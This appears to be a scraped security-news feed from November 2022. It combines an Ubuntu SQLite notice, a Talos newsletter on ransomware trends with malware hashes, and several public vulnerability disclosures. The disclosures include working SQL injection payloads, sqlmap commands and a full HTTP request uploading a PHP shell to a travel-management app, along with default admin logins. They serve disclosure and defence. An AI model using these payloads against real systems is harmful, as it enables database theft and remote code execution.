Ubuntu Security Notice 5712-1 - It was discovered that SQLite did not properly handle large string inputs in certain circumstances. An attacker could possibly use this issue to cause a denial of service or arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-5712-1November 03, 2022sqlite3 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:SQLite could be made to crash or run programs as your login if itreceived specially crafted input.Software Description:- sqlite3: C library that implements an SQL database engineDetails:It was discovered that SQLite did not properly handle large stringinputs in certain circumstances. An attacker could possibly use thisissue to cause a denial of service or arbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libsqlite3-0                    3.11.0-1ubuntu1.5+esm2   sqlite3                          3.11.0-1ubuntu1.5+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5712-1   CVE-2022-35737

Ubuntu Security Notice USN-5712-1

Senayan Library Management System version 9.5.0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.5.0 a.k.a SLIMS 9 BULIAN SQLi## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0## Description:The `keywords` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the keywords parameter, and a generalerror message was returned.Two single quotes were then submitted and the error messagedisappeared. The injection is confirmed manually from nu11secur1ty.The attacker can retrieve all information from the database of thissystem, by using this vulnerability.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: keywords (GET)    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECTSLEEP(5)#    Type: time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)## Proof and Exploit:[href](https://streamable.com/63og5v)## Time spent`3:00`

Senayan Library Management System 9.5.0 SQL Injection

Welcome to this week’s edition of the Threat Source newsletter.
I’m fascinated by how things live and die on the internet. Things that are ubiquitous to our daily lives are simply gone the next. LiveJournal and Myspace we hardly knew you. Elon Musk’s purchase

Thursday, November 3, 2022 16:11

Welcome to this week’s edition of the Threat Source newsletter.

I’m fascinated by how things live and die on the internet. Things that are ubiquitous to our daily lives are simply gone the next. LiveJournal and Myspace we hardly knew you. Elon Musk’s purchase of Twitter and the subsequent exodus led me down the nostalgic path of thinking about how times change and platforms change but things largely remain the same. Until now. We’ve grown as an entire internet community and we remember the pain of moving from app to app and site to site. Many top infosec follows have deactivated their accounts while others are weighing when and if they will leave. Several have moved to decentralized solutions like mastodon.social which saw an uptick of more than 70,000 new users in a single day after the purchase was official. In theory Mastadon can’t be controlled by a single person or entity and to me it feels like this is the next step in our path as an internet community. Will it catch on and be the answer to all of our needs? Doubtful. It is a step in the evolution of the internet and I’m very interested to see what the next adaptation brings.

**The one big thing**

Cisco Talos Incident Response recently released their Quarterly Report highlighting the ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter. This quarter saw ongoing Qakbot, Hive, and Vice Society activity as well as the emergence of Black Basta, which first surfaced in April 2022. Adversaries continue to leverage not only LoLBins but a variety of publicly available tools and scripts hosted on GitHub repositories or free to download from third-party websites to support operations across multiple stages of the attack lifecycle. Defenders continue to struggle with MFA rollouts, as lack of MFA remains one of the biggest impediments to enterprise security. Nearly 18 percent of engagements either had no MFA or only had it enabled on a handful of accounts and critical services.

**Why do I care?**

Understanding the current tools and trends used by attackers, as well as understanding the vulnerabilities that are targeted are intrinsic to good security posture. Knowing your environment is step one. Understanding that same environment from the view of the attacker is the next step. Per the report “In nearly 15 percent of engagements this quarter, adversaries identified and/or exploited misconfigured public-facing applications by conducting SQL injection attacks against external websites, exploiting Log4Shell in vulnerable versions of VMware Horizon, and targeting misconfigured and/or publicly exposed servers.”

**So now what?**

Ensuring that you know your environment and are covering the base of the security pyramid well is critical. Patch, self-assess, and follow trusted threat intelligence sources. Talos IR recommends disabling VPN access for all accounts that are not using two-factor authentication and to disable or delete inactive accounts from Active Directory to prevent suspicious activity.

For the OpenSSL vulnerability we strongly recommend users mitigate affected OpenSSL systems as soon as possible by upgrading to version 3.0.7. Talos has released coverage across the device portfolio including Snort Rules: 60790, 300306-300307 to protect against exploitation of CVE-2022-3602 and ClamAV signature, Multios.Exploit.CVE\_2022\_3602-9976476-0, to detect malware artifacts related to this threat.

**Top security headlines of the week**

Security researchers were once again falsely implied by a ransomware gang in an effort to indicate their involvement. This time around Azov implicated BleepingComputer, Hasherazade, MalwareHunterTeam, Michael Gillespie, Lawrence Abrams, and Vitali Kremez, urging infected users to contact them via their accounts on Twitter to recover files.

Dropbox was the target of a recent phishing campaign that led to attackers gaining access to code stored in Github and copying 130 code repositories, including third-party libraries, internal software projects, and a few tools and configuration files maintained by the Dropbox security team. The attackers didn't gain access to any user content, passwords, or payment information. The Dropbox security team released a report detailing how they handled the incident.

**Can't get enough Talos?**

*   https://blog.talosintelligence.com/researcher-spotlight-how-azim-khodjibaev-went-from-hunting-real-world-threats-to-threats-on-the-dark-web/
*   https://blog.talosintelligence.com/quarterly-report-incident-response-trends-in-q3-2022/
*   https://blog.talosintelligence.com/openssl-vulnerability/
*   https://youtu.be/KhG6RUZgMas

**Upcoming events where you can find Talos**

BSides Lisbon (Nov. 10 - 11)  
Cidade Universitária, Lisboa, Portugal

SIS(Security Intelligence Summit), 2022.ON (Nov. 29)  
Josun Palace, Seoul

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

  
SHA256:  
d5dc790f6f220cf7e42c6c1c9f5bc6e4443cb52d07bcdef24a6bf457153c1d86  
MD5: 69fbf6849d935432bac8b04bdb00fd68  
Typical Filename: KMSAuto++.exe  
Detection Name: W32.File.MalParent

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:  
125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA 256:  
00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
MD5: d47fa115154927113b05bd3c8a308201  
Typical Filename: outlook.exe  
Claimed Product: MS Outlook  
Detection Name: W32.00AB15B194-95.SBX.TG

Threat Source newsletter (Nov. 3, 2022): Mastadon, evolution, and LiveJournal oh my!

Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /operations/travellers.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: YorkLee

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/travellers.php

Loophole location: Online Tours & Travels management system's add\_travellers.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /tour/admin/operations/travellers.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/add\_travellers.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------9453452924520
Content-Length: 1097
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-username"
hhhh
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-email"
11111111@qq.com
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-password"
$&@%bBHGu111
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-confirm-password"
$&@%bBHGu111
\-----------------------------9453452924520
Content-Disposition: form-data; name="state\_name"
Haryana
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-digits"
1888888888
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-suggestions"
11111
\-----------------------------9453452924520
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------9453452924520
Content-Disposition: form-data; name="submit"
\-----------------------------9453452924520--

The files will be uploaded to this directory \\tour\\admin\\img

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43061: Cve_report/RCE-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Master.php?f=delete\_appointment

Vulnerability location: /odlms/classes/Master.php?f=delete\_appointment,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_appointment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43062: Cve_report/SQLi-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Users.php?f=delete_client.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_client

Vulnerability location: /odlms/classes/Users.php?f=delete\_client,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43063: Cve_report/SQLi-2.md at main · YorkLee53645349/Cve_report

OpenCart 3.0.3.7 allows users to obtain database information or read server files through SQL injection in the background.

**OpenCart allows users on admin page to obtain database information or read server files through SQL injection**

Moderate severity GitHub Reviewed Published Nov 3, 2022 • Updated Nov 4, 2022

GHSA-236j-rfx5-wq38: OpenCart allows users on admin page to obtain database information or read server files through SQL injection

MKCMS V6.2 has SQL injection via /ucenter/reg.php name parameter.

**0x00:Lead In**

> Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh

This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php

/system/library.php
<?php
...
if (!get\_magic\_quotes\_gpc()) {
    if (!empty($\_GET)) {        $\_GET \= addslashes\_deep($\_GET);    }    if (!empty($\_POST)) {        $\_POST \= addslashes\_deep($\_POST);    }    $\_COOKIE \= addslashes\_deep($\_COOKIE);    $\_REQUEST \= addslashes\_deep($\_REQUEST);
}
function addslashes\_deep($\_var\_0)
{
    if (empty($\_var\_0)) {        return $\_var\_0;    } else {        return is\_array($\_var\_0) ? array\_map('addslashes\_deep', $\_var\_0) : addslashes($\_var\_0);    }\_var\_0
}

While it uses stripslashes somewhere by mistake, let's do a global search about it, we get **3 SQL injections**  

**0x01:PreAuth SQL injection in /ucenter/repass.php**

MKCMS V6.2 has SQL injection via the /ucenter/repass.php _name_ parameter.

/ucenter/repass.php
<?php
...
if(isset($\_POST\['submit'\])){
$username \= stripslashes(trim($\_POST\['name'\]));
$email \= trim($\_POST\['email'\]);
$query \= mysql\_query("select u\_id from mkcms\_user where u\_name='$username' and u\_email='$email'");
  ...    

and it can be automated exploited by sqlmap namely

sqlmap -u http://localhost/ucenter/repass.php  --data "name=1&email\=1@1.com" -p name 
Parameter: name (POST)
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=11' AND (SELECT 7672 FROM (SELECT(SLEEP(5)))NmRk) AND 'VTKx'='VTKx&email\=222@222.m&submit\=

And this can be tracked in 2019 via https://xz.aliyun.com/t/4189#toc-1  by CoolCat, so CVE request of this vuln won't belong to me, I just wanna enrich the CVE database.  

**0x02:PreAuth SQL injection in /ucenter/active.php**

MKCMS V6.2 has SQL injection via the /ucenter/active.php _verify_ parameter.

/ucenter/active.php
<?php
...
$verify \= stripslashes(trim($\_GET\['verify'\]));  
$nowtime \= time();
$query \= mysql\_query("select u\_id from mkcms\_user where u\_question='$verify'");
$row \= mysql\_fetch\_array($query);
...

Likewise, attackers can exploit it via sqlmap by typing  

sqlmap \-u http://localhost/ucenter/active.php?verify\=1 
Parameter: verify (GET)
    Type: time-based blind    Title: MySQL >\= 5.0.12 AND time-based blind (query SLEEP)    Payload: verify\=1' AND (SELECT 5656 FROM (SELECT(SLEEP(5)))xcPF) AND 'TRJq'='TRJq
    Type: UNION query    Title: Generic UNION query (NULL) \- 1 column    Payload: verify\=1' UNION ALL SELECT CONCAT(0x7171786b71,0x706d4e457048744251624653456d554a685a77654c66497a736d704c7454586462716f457a56587a,0x71707a7671)-- WUGv        

**0x03:PreAuth SQL injection in /ucenter/reg.php**

MKCMS V6.2 has SQL injection via the /ucenter/reg.php _name_ parameter.h

/ucenter/reg.php
<?php 
...
if(isset($\_POST\['submit'\])){
$username \= stripslashes(trim($\_POST\['name'\]));
$query \= mysql\_query("select u\_id from mkcms\_user where u\_name='$username'");
  ...

Again, sqlmap can be used to automate the exploitation  

sqlmap -u http://localhost/ucenter/reg.php  --data "name=1&submit\=1@1.com" -p name  
Parameter: name (POST)
    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: name=1' AND 2487=2487 AND 'WOhs'='WOhs&submit\=1@1.com
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=1' AND (SELECT 6840 FROM (SELECT(SLEEP(5)))rygh) AND 'eoEE'='eoEE&submit\=1@1.com

**0x04:Mitigation**

remove the ​stripslashes() before the POST/GET param, thus we can't exploit it unless the coding of MYSQL is GBK/GB2312, i.e._wide byte sql injection._

(In my opinion,  is there any need to escape the name? it has never been allowed at all !

CVE-2020-22818: MKCMS V6.2 has mutilple vulnerabilities

Affected version：3.0.3.7 (or < 3.0.3.7 ?)

Suppose I have obtained the admin rights of the website backend

Backstage->system->maintenance->backup/restore->restore

import file，Capture，Modify file content

Payload：INSERT INTO \`opencart\`.\`oc\_api\_ip\` (\`api\_ip\_id\`, \`api\_id\`, \`ip\`) VALUES (5, 5, ‘123’ or updatexml(1,concat(0x7e,(version())),0) or’’);\\n

If there is no error information，We may use sql time injection to achieve the effect.

Through this loophole，We can get information in the database or read the file on the computer through LOAD\_FILE().

The vulnerability code is as follows

Tag

#sql